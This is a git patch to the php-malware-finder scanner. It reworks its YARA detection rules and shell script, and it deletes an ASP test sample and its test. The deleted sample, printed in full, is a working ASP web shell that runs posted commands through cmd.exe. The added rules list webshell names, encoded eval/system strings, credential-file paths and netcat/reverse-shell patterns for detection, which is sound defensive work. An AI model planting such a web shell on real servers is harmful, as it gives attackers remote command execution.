From 3724a206fcfaf3578945acfb5fbcb4a85ef33441 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Wed, 21 Feb 2018 11:34:54 +0100
Subject: Major cleanup of useless files

---
 php-malware-finder/asp.yar                    |  46 ------
 php-malware-finder/php.yar                    | 219 ++++++++++++++++++++++++--
 php-malware-finder/phpmalwarefinder           | 153 +++---------------
 php-malware-finder/samples/classic/cmdasp.asp |  55 -------
 php-malware-finder/tests.sh                   |   3 -
 5 files changed, 226 insertions(+), 250 deletions(-)
 delete mode 100644 php-malware-finder/asp.yar
 delete mode 100644 php-malware-finder/samples/classic/cmdasp.asp

diff --git a/php-malware-finder/asp.yar b/php-malware-finder/asp.yar
deleted file mode 100644
index 6af74fb..0000000
--- a/php-malware-finder/asp.yar
+++ /dev/null
@@ -1,46 +0,0 @@
-import "hash"
-include "whitelist.yar"
-include "common.yar"
-
-global private rule IsAsp
-{
-    strings:
-        $asp = /<%|@{}/
-        $cs = /using .{4,25};/
-
-    condition:
-        ($asp or $cs) and filesize < 5MB
-}
-
-rule ObfuscatedAsp
-{
-    strings:
-        $ = /LANGUAGE\s*=\s*VBScript.Encode/ nocase
-        $ = /(".{1,5}"&){5,}/ // "e"&"v"&"a"&"l"
-        $ = /(chr\s*\(\s*\d{1,3}\s*\)[+\)\s]*){5,}/ nocase // chr(114)+chr(101)+chr(113)+chr(117)+chr(101)
-        $stunnix = /execute\("dIm [a-z]*"\):[a-z]* = unescape/ nocase // http://stunnix.com/
-
-    condition:
-        any of them and not IsWhitelisted 
-}
-
-rule ObfuscatedEncodingAsp
-{
-    strings:
-        $unicode = /\\u[a-f0-9]/ nocase
-        $html_encode = /&#([0-9]{3}|x[a-f0-9]{2});/ nocase
-
-    condition:
-        (#unicode >= 10 or #html_encode >= 10) and not IsWhitelisted 
-}
-
-rule DangerousAsp
-{
-    strings:
-        $ = /createobject\s*\(\s*"(WScript\.Shell|WScript\.Network|Shell\.Application|Scripting\.FileSystemObject|ScriptControl)/ nocase
-        $ = /eval\s*\({0,1}\s*request/ nocase
-
-    condition:
-        2 of them and not IsWhitelisted
-}
-
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 57d6e27..06713d5 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -1,6 +1,5 @@
 import "hash"
 include "whitelist.yar"
-include "common.yar"
 
 /*
     Detect:
@@ -35,15 +34,15 @@ global private rule IsPhp
 
 rule NonPrintableChars
 {
-	strings:
-		/*
-		Searching only for non-printable characters completely kills the perf,
-		so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7)
-		to get an acceptable speed.
-		*/
-		$non_printables = /(function|return|base64_decode).{,256}[^\x09-\x0d\x20-\x7E]{3}/
+  strings:
+    /*
+    Searching only for non-printable characters completely kills the perf,
+    so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7)
+    to get an acceptable speed.
+    */
+    $non_printables = /(function|return|base64_decode).{,256}[^\x09-\x0d\x20-\x7E]{3}/
 
-	condition:
+  condition:
         (any of them) and not IsWhitelisted
 }
 
@@ -98,8 +97,8 @@ rule DodgyPhp
         $various = "<!--#exec cmd="  //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec
         $at_eval = /@eval\s*\(/ nocase
         $double_var = /\${\s*\${/
-		    $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
-				$reversed = /noitcnuf_etaerc|metsys|urhtssap|edulcni|etucexe_llehs/ nocase
+        $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
+        $reversed = /noitcnuf_etaerc|metsys|urhtssap|edulcni|etucexe_llehs/ nocase
 
     condition:
         (any of them) and not IsWhitelisted
@@ -153,8 +152,8 @@ rule DangerousPhp
         $ = "show_source" fullword nocase
         $ = "socket_create(AF_INET, SOCK_STREAM, SOL_TCP)" nocase
         $ = "stream_socket_pair" nocase
-		$ = "suhosin.executor.func.blacklist" nocase
-		$ = "unregister_tick_function" fullword nocase
+        $ = "suhosin.executor.func.blacklist" nocase
+        $ = "unregister_tick_function" fullword nocase
         $ = "win32_create_service" fullword nocase
         $ = "xmlrpc_decode" fullword nocase nocase
         $ = /ob_start\s*\(\s*[^\)]/  //ob_start('assert'); echo $_REQUEST['pass']; ob_end_flush();
@@ -175,3 +174,197 @@ rule HiddenInAFile
     condition:
         ($gif at 0 or $png at 0 or $jpeg at 0) and (PasswordProtection or ObfuscatedPhp or DodgyPhp or DangerousPhp) and not IsWhitelisted
 }
+
+rule CloudFlareBypass
+{
+    strings:
+        $ = "chk_jschl"
+        $ = "jschl_vc"
+        $ = "jschl_answer"
+
+    condition:
+        2 of them // Better be safe than sorry
+}
+
+private rule IRC
+{
+    strings:
+        $ = "USER" fullword nocase
+        $ = "PASS" fullword nocase
+        $ = "PRIVMSG" fullword nocase
+        $ = "MODE" fullword nocase
+        $ = "PING" fullword nocase
+        $ = "PONG" fullword nocase
+        $ = "JOIN" fullword nocase
+        $ = "PART" fullword nocase
+
+    condition:
+        5 of them
+}
+
+private rule base64
+{
+    strings:
+        $user_agent = "SFRUUF9VU0VSX0FHRU5UCg"
+        $eval = "ZXZhbCg"
+        $system = "c3lzdGVt"
+        $preg_replace = "cHJlZ19yZXBsYWNl"
+        $exec = "ZXhlYyg"
+        $base64_decode = "YmFzZTY0X2RlY29kZ"
+        $perl_shebang = "IyEvdXNyL2Jpbi9wZXJsCg"
+        $cmd_exe = "Y21kLmV4ZQ"
+        $powershell = "cG93ZXJzaGVsbC5leGU"
+
+    condition:
+        any of them
+}
+
+private rule hex
+{
+    strings:
+        $globals = "\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53" nocase
+        $eval = "\\x65\\x76\\x61\\x6C\\x28" nocase
+        $exec = "\\x65\\x78\\x65\\x63" nocase
+        $system = "\\x73\\x79\\x73\\x74\\x65\\x6d" nocase
+        $preg_replace = "\\x70\\x72\\x65\\x67\\x5f\\x72\\x65\\x70\\x6c\\x61\\x63\\x65" nocase
+        $http_user_agent = "\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54" nocase
+        $base64_decode = "\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65\\x28" nocase
+    
+    condition:
+        any of them
+}
+
+private rule Hpack
+{
+    strings:
+    $globals = "474c4f42414c53" nocase
+        $eval = "6576616C28" nocase
+        $exec = "65786563" nocase
+        $system = "73797374656d" nocase
+        $preg_replace = "707265675f7265706c616365" nocase
+        $base64_decode = "61736536345f6465636f646528677a696e666c61746528" nocase
+    
+    condition:
+        any of them
+}
+
+private rule strrev
+{
+    strings:
+        $globals = "slabolg" nocase fullword
+        $preg_replace = "ecalper_gerp" nocase fullword
+        $base64_decode = "edoced_46esab" nocase fullword
+        $gzinflate = "etalfnizg" nocase fullword
+    
+    condition:
+        any of them
+}
+
+
+rule SuspiciousEncoding
+{
+    condition:
+        (base64 or hex or strrev or Hpack) and not IsWhitelisted
+}
+
+rule DodgyStrings
+{
+    strings:
+        $ = ".bash_history"
+        $ = /AddType\s+application\/x-httpd-(php|cgi)/ nocase
+        $ = /php_value\s*auto_prepend_file/ nocase
+        $ = /SecFilterEngine\s+Off/ nocase  // disable modsec
+        $ = /Add(Handler|Type|OutputFilter)\s+[^\s]+\s+\.htaccess/ nocase
+        $ = ".mysql_history"
+        $ = ".ssh/authorized_keys"
+        $ = "/(.*)/e"  // preg_replace code execution
+        $ = "/../../../"
+        $ = "/etc/passwd"
+        $ = "/etc/proftpd.conf"
+        $ = "/etc/resolv.conf"
+        $ = "/etc/shadow"
+        $ = "/etc/syslog.conf"
+        $ = "/proc/cpuinfo" fullword
+        $ = "/var/log/lastlog"
+        $ = "/windows/system32/"
+        $ = "LOAD DATA LOCAL INFILE" nocase
+        $ = "WScript.Shell"
+        $ = "WinExec"
+        $ = "b374k" fullword nocase
+        $ = "backdoor" fullword nocase
+        $ = /(c99|r57|fx29)shell/
+        $ = "cmd.exe" fullword nocase
+        $ = "powershell.exe" fullword nocase
+        $ = /defac(ed|er|ement|ing)/ fullword nocase
+        $ = "evilc0ders" fullword nocase
+        $ = "exploit" fullword nocase
+        $ = "find . -type f" fullword
+        $ = "hashcrack" nocase
+        $ = "id_rsa" fullword
+        $ = "ipconfig" fullword nocase
+        $ = "kernel32.dll" fullword nocase
+        $ = "kingdefacer" nocase
+        $ = "Wireghoul" nocase fullword
+        $ = "LD_PRELOAD" fullword
+        $ = "libpcprofile"  // CVE-2010-3856 local root
+        $ = "locus7s" nocase
+        $ = "ls -la" fullword
+        $ = "meterpreter" fullword
+        $ = "nc -l" fullword
+        $ = "netstat -an" fullword
+        $ = "php://"
+        $ = "ps -aux" fullword
+        $ = "rootkit" fullword nocase
+        $ = "slowloris" fullword nocase
+        $ = "suhosin" fullword
+        $ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell.
+    $ = /trojan (payload)?/
+        $ = "uname -a" fullword
+        $ = "visbot" nocase fullword
+        $ = "warez" fullword nocase
+        $ = "whoami" fullword
+        $ = /(r[e3]v[e3]rs[e3]|w[3e]b|cmd)\s*sh[e3]ll/ nocase
+        $ = /-perm -0[24]000/ // find setuid files
+        $ = /\/bin\/(ba)?sh/ fullword
+        $ = /hack(ing|er|ed)/ nocase
+        $ = /(safe_mode|open_basedir) bypass/ nocase
+        $ = /xp_(execresultset|regenumkeys|cmdshell|filelist)/
+
+        $vbs = /language\s*=\s*vbscript/ nocase
+        $asp = "scripting.filesystemobject" nocase
+
+    condition:
+        (IRC or 2 of them) and not IsWhitelisted
+}
+
+rule Websites
+{
+    strings:
+        $ = "1337day.com" nocase
+        $ = "antichat.ru" nocase
+        $ = "b374k" nocase
+        $ = "ccteam.ru" nocase
+        $ = "crackfor" nocase
+        $ = "darkc0de" nocase
+        $ = "egyspider.eu" nocase
+        $ = "exploit-db.com" nocase
+        $ = "fopo.com.ar" nocase  /* Free Online Php Obfuscator */
+        $ = "hashchecker.com" nocase
+        $ = "hashkiller.com" nocase
+        $ = "md5crack.com" nocase
+        $ = "md5decrypter.com" nocase
+        $ = "milw0rm.com" nocase
+        $ = "milw00rm.com" nocase
+        $ = "packetstormsecurity" nocase
+        $ = "pentestmonkey.net" nocase
+        $ = "phpjiami.com" nocase
+        $ = "rapid7.com" nocase
+        $ = "securityfocus" nocase
+        $ = "shodan.io" nocase
+        $ = "github.com/b374k/b374k" nocase
+        $ = "mumaasp.com" nocase
+
+    condition:
+        (any of them) and not IsWhitelisted
+}
+
diff --git a/php-malware-finder/phpmalwarefinder b/php-malware-finder/phpmalwarefinder
index 23c71df..63b1f1c 100755
--- a/php-malware-finder/phpmalwarefinder
+++ b/php-malware-finder/phpmalwarefinder
@@ -1,18 +1,14 @@
 #!/usr/bin/env bash
 
-
 YARA=$(type -P yara)
-CONFIG_PATH='/etc/phpmalwarefinder/common.yar'
-IONICE_BIN=$(type -P ionice)
-NICE_BIN=$(type -P nice)
-FORMAT="php"
+CONFIG_PATH='/etc/phpmalwarefinder/php.yar'
 
 if [ ! -x "$YARA" ]
 then
     YARA='./yara'
     if [ ! -x "$YARA" ]
     then
-        echo "Unable to find yara in your PATH, and in the current directory."
+        echo 'Unable to find yara in your $PATH, and in the current directory.'
         exit 0
     fi
 fi
@@ -20,130 +16,49 @@ fi
 if [ ! -f "$CONFIG_PATH" ]
 then
     OLD_PATH=$CONFIG_PATH
-    CONFIG_PATH='./common.yar'
+    CONFIG_PATH='./php.yar'
     if [ ! -f "$CONFIG_PATH" ]
     then
-        echo "Unable to find 'common.yar' in $OLD_PATH, and in the current directory."
+        echo "Unable to find 'php.yar' in $OLD_PATH, and in the current directory."
         exit 0
     fi
 fi
 
-if [ -x "${IONICE_BIN}" ]
-then
-    NICE=${IONICE_BIN}
-    NICE_OPTS="-c 3"
-else
-    if [ -x "${NICE_BIN}" ]
-    then
-        NICE=${NICE_BIN}
-        NICE_OPTS="-n 20"
-    fi
-fi
-
-update_rules() {
-  SITE="https://raw.githubusercontent.com/nbs-system/php-malware-finder/master/php-malware-finder/"
-  RULES_FILES=('asp.yar' 'common.yar' 'php.yar'
-  'whitelist.yar' 'whitelists/drupal.yar' 'whitelists/magento2.yar'
-  'whitelists/phpmyadmin.yar' 'whitelists/prestashop.yar'
-  'whitelists/symfony.yar' 'whitelists/wordpress.yar' )
-  CONFIG_DIR="/etc/phpmalwarefinder/"
-
-  if [ ! -d $CONFIG_DIR ]; then
-      if [ ! -f ./common.yar ]; then
-          echo "no rules in $CONFIG_DIR or ./, exiting"
-          exit 1
-      else
-          CONFIG_DIR="./"
-      fi;
-  fi;
-
-  for FILE in ${RULES_FILES[@]}; do
-    wget $SITE/$FILE -O $CONFIG_DIR/$FILE
-  done
-}
-
-# Determines the format of the target
-# Check only the file extension and it's not even accurate
-determine_format() {
-    # First case: target is a file
-    if [ -f "$1" ]; then
-        echo "$1" | sed 's/.*\.//'
-    # Second case: it is a folder
-    elif [ -d "$1" ]; then
-        find "$1" -type f -name '*.*' | sed 's/.*\.//' | uniq -c | sort -nr | head -1 | awk '{print $2}'
-    fi
-}
-
-one_line_trick() {
-
-    if [ -z "$FORMAT" ]; then
-        FORMAT=$(determine_format "$1")
-    fi
-
-    case $FORMAT in
-        'asp')
-            EXT='*.asp* -o -iname *.cs[^s]*'
-            ;;
-        'php')
-            EXT='*.ph*'
-            ;;
-        *)
-            echo "Couldn't determine the file format, or cannot parse it. Exiting."
-            exit 1
-            ;;
-    esac
-
-    find "$@" -type f -iname "$EXT" -print0  | while IFS= read -r -d '' -r file; do
-     read -r lines _ chars _ <<< "$(wc "$file")"
-     
-     if [ "$lines" -le "2" ]; then
-        # humm, 2 lines long file ?
-        if [ "$chars" -ge "300" ]; then
-            echo "TooShort $file"
-        fi;
-    fi;
-  done;
-
-}
-
 needle_in_haystack() {
 
   needle=$(mktemp)
-  egrep '(PasswordProtection|Websites|TooShort|NonPrintableChars)' $1 > $needle
-  if [ ! "$(wc -l $needle | awk '{print $1}')" = "0" ]; then
+  grep -E '(PasswordProtection|Websites|TooShort|NonPrintableChars)' $1 > $needle
+  if [ ! "$(wc -l "$needle" | awk '{print $1}')" = "0" ]; then
       echo "================================================="
       echo "You should take a look at the files listed below:"
-      cat $needle
+      cat "$needle"
   fi;
-  rm $needle
+  rm "$needle"
 }
 
 show_help() {
     cat << EOF
 Usage ${0##*/} [-cfhtvl] <file|folder> ...
-    -L  Check long lines
+    -c  Optional path to a rule file
     -f  Fast mode
     -h  Show this help message
-    -l  Set language ('asp', 'php')
-    -r  Optional path to a rule file
     -t  Specify the number of threads to use (8 by default)
-    -u  update rules
     -v  Verbose mode
 EOF
 }
 
 OPTIND=1
-while getopts "c:fht:vl:Lu" opt; do
+while getopts "c:fht:v" opt; do
     case "$opt" in
-        h)
-            show_help
-            exit 0
+        c)
+            CONFIG_PATH=${OPTARG}
             ;;
         f)
             OPTS="${OPTS} -f"
             ;;
-        c)
-            CONFIG_PATH=${OPTARG}
+        h)
+            show_help
+            exit 0
             ;;
         t)
             OPTS="${OPTS} --threads=${OPTARG}"
@@ -151,16 +66,6 @@ while getopts "c:fht:vl:Lu" opt; do
         v)
             OPTS="${OPTS} -s"
             ;;
-        l)
-            FORMAT=${OPTARG}
-            ;;
-        L)
-            LONG_LINES=1
-            ;;
-        u)
-            update_rules
-            exit 0
-            ;;
         '?')
             show_help
             exit 1
@@ -169,15 +74,9 @@ while getopts "c:fht:vl:Lu" opt; do
 done
 shift "$((OPTIND-1))"
 
-if [ ! -e ${YARA} ]
-then
-    echo "Can't find yara. Did you installed it?"
-    exit 1
-fi
-
 if [ ! -e "${CONFIG_PATH}" ]
 then
-    echo "${CONFIG_PATH} doesn't exist. Please give me a valid file."
+    echo "The configuration file ${CONFIG_PATH} doesn't exist. Please give me a valid file."
     exit 1
 fi
 
@@ -187,28 +86,16 @@ then
     exit 1
 fi
 
-if [ ! -e "${NICE}" ]
-then
-    echo "No nice program available. Please install ionice or nice."
-fi
-
-
-# only use the I/O intensive search if explicitly asked by user
-if [ -e "${LONG_LINES}" ]
-then
-    one_line_trick "$@"
-fi
 
 # Include correct yara rule
-CONFIG_PATH=${CONFIG_PATH%/*}/
-OPTS="${OPTS} -r ${CONFIG_PATH}${FORMAT}.yar"
+OPTS="${OPTS} -r ${CONFIG_PATH}"
 
 # Copy outpout to temporary file
 output=$(mktemp)
 # delete trailing slash for directories to prevent double slash (issue #40)
 target=$(echo "$@" | sed s'#/$##')
 # Execute rules
-${NICE} ${NICE_OPTS} $YARA $OPTS "$target" |tee $output 
+$YARA $OPTS $target |tee $output 
 
-needle_in_haystack $output
-rm $output # comment this if you want to keep output
+needle_in_haystack "$output"
+rm "$output"
diff --git a/php-malware-finder/samples/classic/cmdasp.asp b/php-malware-finder/samples/classic/cmdasp.asp
deleted file mode 100644
index 31ba9a5..0000000
--- a/php-malware-finder/samples/classic/cmdasp.asp
+++ /dev/null
@@ -1,55 +0,0 @@
-<%@ Language=VBScript %>
-<%
-  ' --------------------o0o--------------------
-  '  File:    CmdAsp.asp
-  '  Author:  Maceo <maceo @ dogmile.com>
-  '  Release: 2000-12-01
-  '  OS:      Windows 2000, 4.0 NT
-  ' -------------------------------------------
-
-  Dim oScript
-  Dim oScriptNet
-  Dim oFileSys, oFile
-  Dim szCMD, szTempFile
-
-  On Error Resume Next
-
-  ' -- create the COM objects that we will be using -- '
-  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
-  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
-  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-
-  ' -- check for a command that we have posted -- '
-  szCMD = Request.Form(".CMD")
-  If (szCMD <> "") Then
-
-    ' -- Use a poor man's pipe ... a temp file -- '
-    szTempFile = "C:\" & oFileSys.GetTempName( )
-    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
-    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
-
-  End If
-
-%>
-<HTML>
-<BODY>
-<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
-<input type=text name=".CMD" size=45 value="<%= szCMD %>">
-<input type=submit value="Run">
-</FORM>
-<PRE>
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-<br>
-<%
-  If (IsObject(oFile)) Then
-    ' -- Read the output from our command and remove the temp file -- '
-    On Error Resume Next
-    Response.Write Server.HTMLEncode(oFile.ReadAll)
-    oFile.Close
-    Call oFileSys.DeleteFile(szTempFile, True)
-  End If
-%>
-</BODY>
-</HTML>
-
-<!--    http://michaeldaw.org   2006    -->
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index c6a380a..3443cc0 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -97,7 +97,4 @@ run_test real/awvjtnz.php '$reversed:'
 
 run_test undetected/smart.php '0x6:$extract:'
 
-# Asp files
-run_test_asp classic/cmdasp.asp 'DodgyStrings'
-
 echo "[+] Congratz, the $CPT tests succeeded!"
-- 
cgit v1.3